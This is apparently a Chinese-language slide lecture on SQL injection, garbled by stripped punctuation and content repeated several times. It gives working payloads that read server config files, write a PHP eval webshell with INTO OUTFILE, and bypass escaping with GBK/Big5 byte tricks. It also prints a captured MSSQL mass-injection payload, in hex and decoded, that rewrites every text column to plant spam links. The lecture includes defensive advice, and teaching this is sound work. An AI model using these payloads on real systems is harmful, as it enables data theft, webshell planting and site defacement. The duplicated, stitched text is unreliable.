• MySQL/PHP: 对单引号转义时 load_file/outfile 生成一句话 (producing a one-line webshell with load_file/outfile when single quotes are escaped)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--
MSSQL real-world case - 116jurist.ru automated injection, decoded (4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

